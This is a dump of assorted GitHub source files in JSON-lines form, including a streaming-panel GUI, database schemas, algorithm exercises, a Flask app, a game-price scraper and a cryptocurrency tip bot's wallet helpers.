else:\n self.window['input_status'].update('Stopped', text_color='red')\n\n # Stream Chat Wars bullshit\n if self.stream_chat_wars_process is not None:\n if self.stream_chat_wars_process.poll() is None:\n self.stream_chat_wars_started = True\n else:\n self.stream_chat_wars_started = False\n if self.stream_chat_wars_started:\n self.window['chat_input'].update('On' if os.path.exists(ACCEPT_INPUT_FILE) else 'Off',\n text_color='green' if os.path.exists(ACCEPT_INPUT_FILE) else 'red')\n self.window['random_inputs'].update('On' if os.path.exists(RANDOM_ACTIONS_FILE) else 'Off',\n text_color='green' if os.path.exists(RANDOM_ACTIONS_FILE) else\n 'red')\n self.window['stream_chat_wars_status'].update(\n 'Running' if self.stream_chat_wars_process.poll() is None\n else 'Failed to start', text_color='green'\n if self.stream_chat_wars_process.poll() is None else 'red')\n hotkeys = self.config.get(\"events\").get(\"hotkeys\")\n self.window['failsafe_hotkey'].update(f'{hotkeys.get(\"failsafe\", \"Shift+Backspace\")}')\n self.window['chat_input_hotkey'].update(f'{hotkeys.get(\"accept_input\", \"F13\")}')\n self.window['random_inputs_hotkey'].update(f'{hotkeys.get(\"random_action\", \"F14\")}')\n self.window['reset_teams_hotkey'].update(f'{hotkeys.get(\"reset_teams\", \"F15\")}')\n if not self.stream_chat_wars_started:\n self.window['stream_chat_wars_status'].update('Stopped', text_color='red')\n\n if self.input_server_started:\n self.window['input_status'].update('Running' if self.input_server_process.poll() is None else\n 'Failed to start', text_color='green' if\n self.input_server_process.poll() is None else 'red')\n if not self.input_server_started:\n self.window['input_status'].update('Stopped', text_color='red')\n\n self.window.refresh()\n\n def stop_obs_server(self):\n self.obs_hook.close_connection()\n self.obs_hook = None\n self.window['obs_setup'].update(visible=False)\n self.window['controls'].update(visible=False)\n","repo_name":"ReggX/SayuPanel","sub_path":"userinterface/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":36359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"72531866749","text":"\"\"\"\n Defines specific services/group ID specifications\n\n A group X may have special specifications defined when running a jupyter-lab-math\n for example that should run on a specific machine.\n\n\"\"\"\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects.postgresql import JSONB\n\nfrom .base import metadata\n\nservices_specifications = sa.Table(\n \"services_specifications\",\n metadata,\n sa.Column(\n \"service_key\",\n sa.String,\n nullable=False,\n doc=\"Service Key Identifier\",\n ),\n sa.Column(\n \"service_version\",\n sa.String,\n nullable=False,\n doc=\"Service version\",\n ),\n sa.Column(\n \"gid\",\n sa.BigInteger,\n sa.ForeignKey(\n \"groups.gid\",\n name=\"fk_services_specifications_gid_groups\",\n onupdate=\"CASCADE\",\n ondelete=\"CASCADE\",\n ),\n doc=\"Group Identifier\",\n ),\n sa.Column(\n \"sidecar\",\n JSONB,\n nullable=True,\n doc=\"schedule-time specifications for the service sidecar (follows Docker Service creation API, see https://docs.docker.com/engine/api/v1.25/#operation/ServiceCreate)\",\n ),\n sa.Column(\n \"service\",\n JSONB,\n nullable=True,\n doc=\"schedule-time specifications for the service (follows Docker Service creation API, see https://docs.docker.com/engine/api/v1.41/#tag/Service/operation/ServiceCreate\",\n ),\n # If service-key/version gets deleted from service_metadata, it should be deleted from here\n sa.ForeignKeyConstraint(\n [\"service_key\", \"service_version\"],\n [\"services_meta_data.key\", \"services_meta_data.version\"],\n onupdate=\"CASCADE\",\n ondelete=\"CASCADE\",\n ),\n # This table stores services (key:version) that consume filetype by AT LEAST one input_port\n # if more ports can consume, then it should only be added once in this table\n sa.PrimaryKeyConstraint(\n \"service_key\",\n \"service_version\",\n \"gid\",\n name=\"services_specifications_pk\",\n ),\n)\n","repo_name":"ITISFoundation/osparc-simcore","sub_path":"packages/postgres-database/src/simcore_postgres_database/models/services_specifications.py","file_name":"services_specifications.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"6"} +{"seq_id":"20822366090","text":"import sys\n\nCAMINO = []\nMAX = 1\nULTIMO = 1\nULTIMA_FILA = 0\nULTIMA_COLUMNA = 0\nRESULTADOS = []\nMAZES = []\n\ndef read_line():\n line = next(sys.stdin).strip()\n if not line:\n return \"\"\n while(len(line) == 0):\n line = next(sys.stdin).strip()\n return line\n\ndef posibles_movimientos(ultimo, x, y, visitados):\n global ULTIMA_FILA, ULTIMA_COLUMNA\n posibles = []\n #Hago esto porque sino, estando en el final, me da como posible movimiento el de al lado\n if x == ULTIMA_FILA:\n return posibles\n if x+1 <= ULTIMA_FILA and G[x+1][y] == ultimo and not (x+1, y) in visitados:\n posibles.append((x+1, y))\n if x-1 >= 1 and G[x-1][y] == ultimo and not (x-1, y) in visitados:\n posibles.append((x-1, y))\n if y+1 <= ULTIMA_COLUMNA and G[x][y+1] == ultimo and not (x, y+1) in visitados:\n posibles.append((x, y+1))\n if y-1 >= 1 and G[x][y-1] == ultimo and not (x, y-1) in visitados:\n posibles.append((x, y-1))\n return posibles\n\n\ndef backtracking(ultimo, x, y, max, visitados=[]):\n global RESULTADOS\n #Si llegue al final y el resultado actual no está en la lista de resultados\n if x == ULTIMA_FILA and (INICIO[0], INICIO[1], x, y) not in RESULTADOS:\n RESULTADOS.append((INICIO[0], INICIO[1], x, y))\n return\n \"\"\"\n * Aca determino si tengo que arrancar el contador de nuevo\n o si sigo aumentandolo\n \"\"\"\n #Si el ultimo numero por el que pase es igual al maximo\n if ultimo == max:\n #Incremento el maximo\n max += 1\n #Vuelvo el contador a 1\n ultimo = 1\n else:\n #Sino, significa que todavia no llegue al maximo, entonces sigo incrementando\n ultimo += 1\n for i, j in posibles_movimientos(ultimo, x, y, visitados):\n visitados.append((i, j))\n backtracking(ultimo, i, j, max, visitados)\n visitados.remove((i, j))\n\nif __name__ == \"__main__\":\n cases = int(read_line())\n for i in range(0, cases):\n G = {}\n blank = read_line()#blank\n filas, columnas = map(int, read_line().split(\" \"))\n RESULTADOS = []\n ULTIMA_FILA = filas\n ULTIMA_COLUMNA = columnas\n for i in range(1, filas+1):\n fila = read_line().split(\" \")\n G[i] = {}\n for j in range(1, columnas+1):\n G[i][j] = int(fila[j-1])\n for i in G[1]:\n if G[1][i] == 1:\n INICIO = (1, i)\n backtracking(1, 1, i, 1) #ultimo, x, y, maximo\n minimo = ()\n for ix, iy, fx, fy in RESULTADOS:\n #Seteo el primero\n if not minimo:\n minimo = (ix, iy, fx, fy)\n else:\n #Si lexicograficamente el inicio actual esta mas a la izquierda que el minimo\n # o lexicograficamente el inicio es igual, pero el final esta mas a la izquierda\n if iy < minimo[1] or (iy == minimo[1] and fy < minimo[3]) and G[fx][fy] >= G[minimo[2]][minimo[3]]:\n #Queda como minimo actual\n minimo = (ix, iy, fx, fy)\n MAZES.append(minimo)\n #Si no hago esto, me da presentation error\n for maze in MAZES[:-1]:\n print(maze[0], maze[1])\n print(maze[2], maze[3])\n print(\"\")\n print(MAZES[-1][0], MAZES[-1][1])\n print(MAZES[-1][2], MAZES[-1][3])\n","repo_name":"nachoyegro/algoritmosunq","sub_path":"868.py","file_name":"868.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"23922830137","text":"'''\n카펫\n\n제한사항\n-갈색 격자의 수 brown은 8 이상 5,000 이하인 자연수입니다.\n-노란색 격자의 수 yellow는 1 이상 2,000,000 이하인 자연수입니다.\n-카펫의 가로 길이는 세로 길이와 같거나, 세로 길이보다 깁니다.\n\n입출력 예\nbrown\tyellow\treturn\n10\t2\t[4, 3]\n8\t1\t[3, 3]\n24\t24\t[8, 6]\n'''\n\ndef solution(brown, yellow):\n divisor = brown + yellow\n answer_list = []\n \n for i in range(1, divisor + 1):\n if divisor % i == 0:\n answer_list.append([divisor // i, i])\n\n for answers in answer_list:\n if answers[0] >= answers[1]:\n if (answers[0] - 2) * (answers[1] - 2) == yellow:\n answer = answers\n \n return answer\n\n'--------'\n\nimport math\n\n\ndef solution1(brown, yellow):\n '''other solution'''\n ans=((brown-4)+math.sqrt((brown-4)**2-16*yellow))//4\n return [ans+2, yellow//ans+2]\n\n\nif __name__ == \"__main__\":\n print(solution(10, 2))\n print(solution1(10, 2))","repo_name":"datajobbu/Algorithms","sub_path":"programmers/lv2_210302_03.py","file_name":"lv2_210302_03.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39134944377","text":"# Four Squares\n# 출처: https://donghak-dev.tistory.com/49\nn = int(input())\n\n# dp[i]: 합이 i와 같게 되는 제곱수들의 최소 개수\ndp = [0] * 50001\ndp[0] = 0\ndp[1] = 1\n\nfor i in range(2, n + 1):\n min_val = int(1e9)\n j = 1\n # 핵심: dp[i] = dp[i - (i 이하의 제곱수)]의 최솟값 + 1\n while (j**2) <= i:\n min_val = min(min_val, dp[i - (j**2)])\n j += 1\n dp[i] = min_val + 1\n\nprint(dp[n])\n\n\"\"\"\n- 난이도: 실버3\n- 분류: dp\n\n- ex. dp[9] = min(dp[9 - 1^2], dp[9 - 2^2], dp[9 - 3^2]) + 1\n = min(dp[8], dp[5], dp[0]) + 1\n = 0 + 1\n = 1\n\"\"\"\n","repo_name":"yg-moon/problem-solving","sub_path":"baekjoon/class/3/3++/17626.py","file_name":"17626.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"24611386809","text":"import re,os,sys,pickle\n\nfout = open(\"/local/datdb/deepgo/data/train/fold_1/DeepGOFlatSeqProtHwayGoNotUsePPI.test.txt\",\"w\")\nname_list = 'GCN Onto2vec BertGOName BiLSTM Bertd11d12 BertAve12 UniformGOVector BertCLS12 BertAsService'.split()\nfor name in name_list: # 'BiLSTM', 'Bertd11d12', 'GCN', 'BertAve12' Base\n ## COMMENT write out result so we can paste into excel\n for onto in ['bp','mf','cc']: \n try:\n fin = open(\"/local/datdb/deepgo/data/train/fold_1/DeepGOFlatSeqProtHwayGoNotUsePPI\"+name+\"/NotNormalize/\"+onto+\"b32lr0.0005RMSprop/test_frequency.log\",\"r\")\n except:\n continue\n print ('\\nmethod {} ontology {}\\n'.format(name,onto))\n fout.write('\\nmethod {} ontology {}\\n'.format(name,onto))\n do_print = False\n for line in fin :\n if ('[MACRO]' in line) or ('fmax' in line): \n do_print = True ## turn on printing\n if ('rec_at_' in line) or ('macro average' in line): \n do_print = False\n if do_print: \n fout.write (line)\n ##!!\n fin.close()\n#\n\nfout.close()\n\n\n","repo_name":"datduong/EncodeGeneOntology","sub_path":"EvaluateLabelType/ExtractAucPrintout.py","file_name":"ExtractAucPrintout.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"47"} +{"seq_id":"12310694691","text":"from flask import Flask, url_for, redirect\nfrom config import DevConfig, TestConfig\nfrom src.models import db, User, migrate\nfrom flask_login import LoginManager\nfrom src.cli import COMMANDS\nfrom src.log_config import log_config\nfrom src.routes import api, api_bp\n\nLOG_MGR = LoginManager()\n\n\ndef register_blueprint(app):\n app.register_blueprint(COMMANDS)\n app.register_blueprint(api_bp)\n\n\ndef create_app():\n app = Flask(__name__)\n if app.config[\"ENV\"] == \"development\":\n app.config.from_object(DevConfig)\n if app.config[\"ENV\"] == \"testing\":\n app.config.from_object(TestConfig)\n LOG_MGR.init_app(app)\n LOG_MGR.login_view = \"/Login\"\n db.init_app(app)\n migrate.init_app(app, db)\n with app.app_context():\n db.create_all()\n api.init_app(app)\n log_config(app)\n register_blueprint(app)\n\n @LOG_MGR.user_loader\n def load_user(id_):\n return User.query.filter_by(id=id_).first()\n\n @LOG_MGR.unauthorized_handler\n def unauthorized():\n return redirect(url_for(endpoint=\"authentication\"))\n\n return app\n","repo_name":"Yurasblv/final_proj","sub_path":"src/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"13580213226","text":"# Madison Hess\n# CSE 163\n# Homework 3\n# The following program takes in a data set containing years, sex, education\n# attainment and the relative percentages for the population percentages given\n# the previous classifications. The following program explores relationships\n# over time, across different sexes, and different degree types in the effort\n# to gain insights related to education trends across different groups.\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn import tree\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error\nimport seaborn as sns\nsns.set()\n\n# Part 0 - Statistical Functions using Pandas\n\n\ndef completions_between_years(df, year1, year2, sex):\n \"\"\"\n Takes in a dataframe, a starting and ending year, and sex and returns a\n dataframe which shows the education attainment across different racial\n groups as well as the whole population (given other restrictions) between\n the specified years.\n \"\"\"\n df = df[(df['Sex'] == sex) & (df['Year'] >= year1) & (df['Year'] < year2)]\n return df\n\n\ndef compare_bachelors_1980(df):\n \"\"\"\n Takes in a dataframe and returns a tuple containing the total percentage\n of males and females, respectively, who at least attained a bachelor's\n degree in 1980.\n \"\"\"\n df = df[(df['Year'] == 1980) & (df['Min degree'] == \"bachelor's\")]\n df = df[(df['Sex'] == 'M') | (df['Sex'] == 'F')]\n df = df[['Sex', 'Total']]\n return tuple(list(df['Total']))\n\n\ndef top_2_2000s(df):\n \"\"\"\n Takes in a dataframe and returns the two most commonly attained degree\n types and the relative average percentage that attained that type for the\n whole population between 2000 and 2010.\n \"\"\"\n df = df[(df['Year'] >= 2000) & (df['Year'] <= 2010) & (df['Sex'] == 'A')]\n df = df.groupby('Min degree')['Total'].mean()\n result = df.nlargest(2)\n return list(result.items())\n\n\ndef percent_change_bachelors_2000s(df, sex='A'):\n \"\"\"\n Takes in a dataframe and an optional sex variable (which defaults to all if\n unspecified) and returns the percent change in bachelor's degree attainment\n for that sex between 2000 and 2010.\n \"\"\"\n df = df[(df['Sex'] == sex)]\n df_00 = df[(df['Year'] == 2000)\n & (df['Min degree'] == \"bachelor's\")].Total.item()\n df_10 = df[(df['Year'] == 2010)\n & (df['Min degree'] == \"bachelor's\")].Total.item()\n return (df_10 - df_00)\n\n\n# Plotting with seaborn\n\n\ndef line_plot_bachelors(df):\n \"\"\"\n Takes in a dataframe and saves a plot to a .png file which graphically\n represents the change in bachelor's degree attainment for the whole\n population since the 1940s.\n \"\"\"\n df = df[(df['Sex'] == 'A') & (df['Min degree'] == \"bachelor's\")]\n sns.lineplot(x='Year', y='Total', data=df)\n plt.savefig('line_plot_bachelors.png', facecolor='w')\n\n\ndef bar_chart_high_school(df):\n \"\"\"\n Takes in a dataframe and saves a bar chart to a .png file which graphically\n represents the total, male, and female percentages of people who recieced\n a high school diploma in 2009.\n \"\"\"\n df = df[(df['Min degree'] == 'high school') & (df['Year'] == 2009)]\n df = df[['Sex', 'Total']]\n sns.catplot(x='Sex', y='Total', data=df, kind='bar')\n plt.savefig('bar_chart_high_school.png', facecolor='w')\n\n\ndef plot_hispanic_min_degrees(df):\n \"\"\"\n Takes in a dataframe and saves a line plot to a .png file which graphically\n represents the change in both percentage attainment of high school diplomas\n and bachelor's degrees amongst Hispanics from 1990 to 2010.\n \"\"\"\n df = df[(df['Year'] >= 1990) & (df['Year'] <= 2010) & (df['Sex'] == 'A')]\n df = df[(df['Min degree'] == 'high school')\n | (df['Min degree'] == \"bachelor's\")]\n df = df[['Year', 'Min degree', 'Hispanic']]\n sns.lineplot(x='Year', y='Hispanic', hue='Min degree', data=df)\n plt.xlim(1990, 2010)\n plt.savefig('plot_hispanic_min_degrees.png', facecolor='w')\n\n\n# Part 2: Machine Learning using scikit-learn\n\n\ndef fit_and_predict_degrees(df):\n \"\"\"\n Develops a simple machine learning program using decision tree regression\n and the year, sex, and min degree from our data to develop a model to\n predict the total percent attainment for each group.\n \"\"\"\n df = df.loc[:, ('Year', 'Sex', 'Min degree', 'Total')].dropna()\n X = df.loc[:, df.columns != 'Total']\n X = pd.get_dummies(X)\n y = df['Total']\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)\n model = tree.DecisionTreeRegressor()\n model = model.fit(X_train, y_train)\n y_train_pred = model.predict(X_train)\n y_test_pred = model.predict(X_test)\n print('Training MSE: ', mean_squared_error(y_train, y_train_pred))\n print('Test MSE', mean_squared_error(y_test, y_test_pred))\n\n\ndef main():\n data = pd.read_csv('hw3-nces-ed-attainment.csv', na_values='---')\n completions_between_years(data, 2007, 2008, 'F')\n compare_bachelors_1980(data)\n top_2_2000s(data)\n percent_change_bachelors_2000s(data)\n line_plot_bachelors(data)\n bar_chart_high_school(data)\n plot_hispanic_min_degrees(data)\n fit_and_predict_degrees(data)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hessmad/Intermediate-Python-Data-Analysis","sub_path":"hw3.py","file_name":"hw3.py","file_ext":"py","file_size_in_byte":5251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40268948696","text":"from kid import Kid\nfrom parent import Parent\n\n\ndef father_mother_kid():\n kid_1 = Kid('Vasya', 5, True, False)\n kid_2 = Kid('Petya', 10, True, False)\n kid_3 = Kid('Ilya', 30, True, False)\n parent = Parent('Boris', 35, [kid_1, kid_2, kid_3])\n\n print(parent.kids[0].age)\n\n\nfather_mother_kid()\n","repo_name":"MikePolynin/python_basic","sub_path":"Module24/04_fathers_mothers_kids/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22132702537","text":"\"\"\"\n입력 예시\n2\n홍길동 95\n이순신 77\n\n출력 예시\n\n이순신 홍길동\n\"\"\"\n\n# N을 입력받기\nN = int(input())\n\n# N명의 학생 정보를 입력받아 리스트에 저장\narray = []\nfor i in range(N):\n input_data = input().split()\n array.append([input_data[0], input_data[1]])\n\n\n# 키(key)를 이용하여, 점수를 기준으로 출력\narray = sorted(array, key=lambda student: student[1])\n\n# 정렬이 수행된 결과를 출력\nfor student in array:\n print(student[0], end = ' ')","repo_name":"hanjungwoo1/CodingTest","sub_path":"이것이 취업을 위한 코딩 테스트다/Chapter 6/6-11.py","file_name":"6-11.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"ko","doc_type":"code","stars":5,"dataset":"github-code","pt":"47"} +{"seq_id":"42461244964","text":"import os\nimport sys\n\nchallenge_data = None\ndata_file_name = os.path.join(os.path.dirname(sys.argv[0]), 'input.txt')\nwith open(data_file_name, 'r') as data_file:\n challenge_data = data_file.read()\ndata_file.close()\n\ninstructions = challenge_data.split('\\n')\n\ni = 0\nsteps = 0\ninstructions = [int(inst) for inst in instructions]\nwhile i < len(instructions):\n steps += 1\n jump_value = instructions[i]\n if jump_value >= 3:\n incremented_instruction = jump_value - 1\n else:\n incremented_instruction = jump_value + 1\n instructions[i] = incremented_instruction\n i = i + jump_value\n\nprint(steps)\n","repo_name":"Sam-Hart/AdventOfCode2017","sub_path":"Day4-AMazeOfTwistyTrampolinesAllAlike/AMazeOfTwistyTrampolinesAllAlikeB.py","file_name":"AMazeOfTwistyTrampolinesAllAlikeB.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"33137723792","text":"\n\ndef merge(A, B):\n\n comparisons = 0\n exchanges = 0\n\n mergedArray = []\n\n while len(A) != 0 and len(B) != 0:\n if A[0] < B[0]:\n mergedArray.append(A[0])\n exchanges+=1\n comparisons+=1\n A.remove(A[0])\n else:\n mergedArray.append(B[0])\n exchanges+=1\n B.remove(B[0])\n\n if len(A) == 0:\n mergedArray += B\n exchanges+=len(B)\n else:\n mergedArray += A\n exchanges+=len(A)\n\n return mergedArray, comparisons, exchanges\n\n\ndef merge_sort(A):\n comparisons = 0\n exchanges = 0\n if len(A) == 0 or len(A) == 1:\n return A, comparisons, exchanges\n else:\n mid = int(len(A) / 2)\n c1 = 0\n c2 = 0\n e1 = 0\n e2 = 0\n firstHalf, c1, e1 = merge_sort(A[:mid])\n secondHalf, c2, e2 = merge_sort(A[mid:])\n\n c3 =0\n e3 =0\n\n A, c3, e3 = merge(firstHalf, secondHalf)\n return A, c3, e3\n","repo_name":"shaoormunir/sorting-algorithm-analysis","sub_path":"MergeSortRecursive.py","file_name":"MergeSortRecursive.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37465541136","text":"import numpy as np\nimport os\nimport math\nimport underworld3 as uw\nfrom petsc4py import PETSc\n\n\n\n\nboxLength = 1.0\nboxHeight = 1.0\nn_els = 32\ndim = 2\nppcell = 10\namplitude = 0.02\noffset = 0.2\n\n\nmesh = uw.mesh.Mesh(elementRes=( n_els,)*dim,\n minCoords =( 0.,)*dim,\n maxCoords =(boxLength,1.),\n simplex=False )\nu_degree = 1\n\n\n# Create swarm\nswarm = uw.swarm.Swarm(mesh)\n# Add variable for material\nmatSwarmVar = swarm.add_variable(name=\"matSwarmVar\", num_components=1, dtype=PETSc.IntType)\n# Note that `ppcell` specifies particles per cell per dim.\nswarm.populate(ppcell=ppcell)\n\n\n#%%\n# define these for convenience.\ndenseIndex = 0\nlightIndex = 1\n\n# material perturbation from van Keken et al. 1997\nwavelength = 2.0*boxLength\nk = 2. * np.pi / wavelength\n\n# init material variable\nwith swarm.access(matSwarmVar):\n perturbation = offset + amplitude*np.cos( k*swarm.particle_coordinates.data[:,0] )\n matSwarmVar.data[:,0] = np.where( perturbation>swarm.particle_coordinates.data[:,1], lightIndex, denseIndex )\n\n\n\n\nfrom sympy import Piecewise, ceiling, Abs\n\ndensity = Piecewise( ( 0., Abs(matSwarmVar.fn - lightIndex)<0.5 ),\n ( 1., Abs(matSwarmVar.fn - denseIndex)<0.5 ),\n ( 0., True ) )\n\n\n\n#this should produce an error\ncheck_eval = uw.function.evaluate(density, mesh.data)\n","repo_name":"dansand/issues","sub_path":"uw3_issues/swarm_mesh_eval_test.py","file_name":"swarm_mesh_eval_test.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30510091529","text":"x = (int)(input())\nfound = 0\nif(x < 4):\n print(1)\nelse:\n for i in range(x,1,-1):\n if(found == 1):\n break\n for coeficiente in range(2,9,1):\n raiz = (i) ** (1 / coeficiente)\n #print(f'raiz {coeficiente} de {i} ={raiz}')\n if(raiz%1 == 0):\n print(i)\n found += 1\n break\n \n","repo_name":"Danilo-Carvalho-Antunes/TEP-1","sub_path":"Lista-4/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26621513604","text":"from adventure import Adventure\nfrom termcolor import colored\nfrom sys import argv\nfrom os.path import dirname, basename\n\nif len(argv) == 1:\n path = \"testing\"\n fileName = \"testAdventure.yaml\"\nelif len(argv) == 2:\n path = dirname(argv[1])\n fileName = basename(argv[1])\nelse:\n print(\"Takes 0 or 1 args:\")\n print(\"1. path to adventure file\")\n exit()\n\nad = Adventure(path,fileName)\nprint(\"*******************************************************\")\nprint(\"* \" + ad.name)\nprint(\"*******************************************************\")\nprint(ad.getQuest())\nprint(\"*******************************************************\")\n\nwhile ad.running:\n print(ad.getLocalDescription())\n action = input(colored(ad.player.name + \" >> \",'red')).split()\n\n if len(action) == 0:\n verb = ' '\n else:\n verb = action[0]\n\n noun = None\n thing = None\n\n if len(action) > 1:\n try:\n noun = int(action[1])\n except:\n noun = None\n if noun in ad.currentNouns:\n thing = ad.currentNouns[noun]\n else:\n print(\"Um, no.\")\n continue\n\n if verb == 'q':\n ad.quit()\n elif verb == 'g':\n if not thing.goesTo == None:\n ad.goToLocation(thing.goesTo)\n elif verb == 'l':\n if thing:\n print(thing.description)\n elif verb == 'a':\n if thing:\n output = ad.listInteractions(thing)\n print(output)\n if \"No\" not in output:\n choice = input(colored(\"Choose an interaction >> \", 'red'))\n print(ad.executeInteraction(thing, choice))\n elif verb == 'f':\n if thing:\n if thing.fight:\n fighting = True\n while fighting:\n print(ad.attack(ad.player,thing))\n print(ad.attack(thing,ad.player))\n print(ad.player.name + \" has \" + str(ad.player.hp) + \"hp left.\")\n if not ad.player.alive:\n print(\"You are dead. Welcome to the afterlife.\")\n ad.quit()\n fighting = False\n elif not thing.alive:\n print(\"You have vanquished your foe. Congrats!\")\n fighting = False\n else:\n choice = input(colored(\"Continue fighting(y/n) >> \",'red'))\n print(\" \")\n if choice == 'n':\n print(\"Phew.\")\n fighting = False\n elif verb == 't':\n if thing:\n print(ad.take(thing.id))\n elif verb == 'p':\n output = ad.listInventory(ad.player)\n print(output)\n if \"No\" not in output:\n choice = input(colored(\"Enter ID of thing to put >> \", 'red'))\n try:\n invThingID = int(choice)\n except:\n invThingID = None\n print(ad.putFromInventory(ad.player,invThingID))\n elif verb == 'i':\n print(ad.listInventory(ad.player))\n elif verb == 's':\n if thing:\n print(ad.listStatus(thing))\n else:\n print(ad.listStatus(ad.player))\n elif verb == 'talk':\n if thing:\n prompts = thing.getPrompts()\n if len(prompts) > 0:\n promptIndex = 0\n for promptString in prompts:\n print(str(promptIndex) + \". \" + promptString)\n promptIndex += 1\n selection = input(colored(\"choice >> \", 'red'))\n try:\n selection = int(selection)\n except:\n selection = 1024\n if selection < promptIndex:\n print(ad.talk(thing,selection))\n else:\n print(\"That's odd.\")\n else:\n print(\"I'm not sure \" + thing.name + \" is interested in talking.\")\n\n\n","repo_name":"kevinputnam/adventure_framework","sub_path":"adventure_test_wrapper.py","file_name":"adventure_test_wrapper.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26438028555","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\ndef Parser(url, name_of_game):\r\n HEADERS = {\r\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36',\r\n 'accept': '*/*'\r\n }\r\n response = requests.get(url, headers=HEADERS)\r\n soup = BeautifulSoup(response.content, 'html.parser')\r\n\r\n cols = []\r\n results = []\r\n result_string = ''\r\n\r\n\r\n table = soup.find('table').find('tbody')\r\n rows = table.findAll('tr')\r\n for row in rows:\r\n cols.append(row.findAll('td'))\r\n\r\n for col in range(len(cols)):\r\n try:\r\n results.append({\r\n 'name_shop': cols[col][0].get_text(strip=True).upper(),\r\n 'price': cols[col][1].get_text(strip=True),\r\n 'link': cols[col][2].find('noindex').find('a').get('href')\r\n })\r\n except IndexError:\r\n pass\r\n for result in results:\r\n result_string += f\"🎮 В магазине {result['name_shop']} игру {name_of_game} можно купить за {result['price']}. \\n\\n👾Ссылка на магазин: {result['link']}\\n\\n\"\r\n return result_string\r\n\r\n","repo_name":"Pol1na/FindGames_ChatBotTG","sub_path":"GamesFinderBot/Soup_IWP.py","file_name":"Soup_IWP.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12898927838","text":"from main import *\ndef preprocess():\n map_file = '../data/ID_map.tab'\n with open(map_file, 'r+') as f:\n lines = f.readlines()\n for i in range(len(lines)):\n line = lines[i]\n line = line.split('\\t')[:-1]\n line[-1] += '\\n'\n line = '\\t'.join(line)\n lines[i] = line\n with open(map_file, 'w') as f:\n f.writelines(lines)\n\ndef get_diff(proteins, threshold = 0):\n l = get_annotated_ids()\n index_mapping = dict(zip(l, range(len(l))))\n d = gene_mapping('id')\n for cancer_name in ['hepatitis', 'breast', 'leukemia']:\n for i in range(1, 21):\n i /= 10\n path = '../tem_data/{}_records/diff_{}.npy'.format(cancer_name, i)\n a = np.load(path)\n for protein in proteins:\n index = index_mapping[protein]\n diffs = a[index]\n if (np.abs(diffs)>threshold).any():\n print('in file:', path)\n print(*d[protein], *np.round(diffs, 3))\n \n\n\n\nif __name__ == '__main__':\n import sys\n query_file = sys.argv[1]\n with open(query_file) as f:\n proteins = f.read().replace(',', ' ').split()\n\n d = gene_mapping('gene')\n found = []\n not_founds = []\n for i in proteins:\n if i in d:\n found.extend(d[i])\n else:\n not_founds.append(i)\n #print('Following proteins not in dict:',*not_founds)\n print('Following proteins found:')\n get_diff(found, 0.5)\n","repo_name":"brown-2/mis_localization","sub_path":"code/query_alternative.py","file_name":"query_alternative.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"11296193474","text":"from typing import List, Dict\n\nfrom m0rkcoin_tip_bot import rpc_client\nfrom m0rkcoin_tip_bot.config import config\n\n\ndef register() -> str:\n result = rpc_client.call_method('createAddress')\n return result['address']\n\n\ndef send_transaction(from_address: str, to_address: str, amount: int) -> str:\n payload = {\n 'addresses': [from_address],\n 'transfers': [{\n \"amount\": amount,\n \"address\": to_address\n }],\n 'fee': config.tx_fee,\n 'anonymity': 0\n }\n result = rpc_client.call_method('sendTransaction', payload=payload)\n return result['transactionHash']\n\n\ndef get_wallet_balance(address: str) -> Dict[str, int]:\n result = rpc_client.call_method('getBalance', {'address': address})\n return result\n\n\ndef get_all_balances(wallet_addresses: List[str]) -> Dict[str, Dict]:\n wallets = {}\n for address in wallet_addresses:\n wallet = rpc_client.call_method('getBalance', {'address': address})\n wallets[address] = wallet\n return 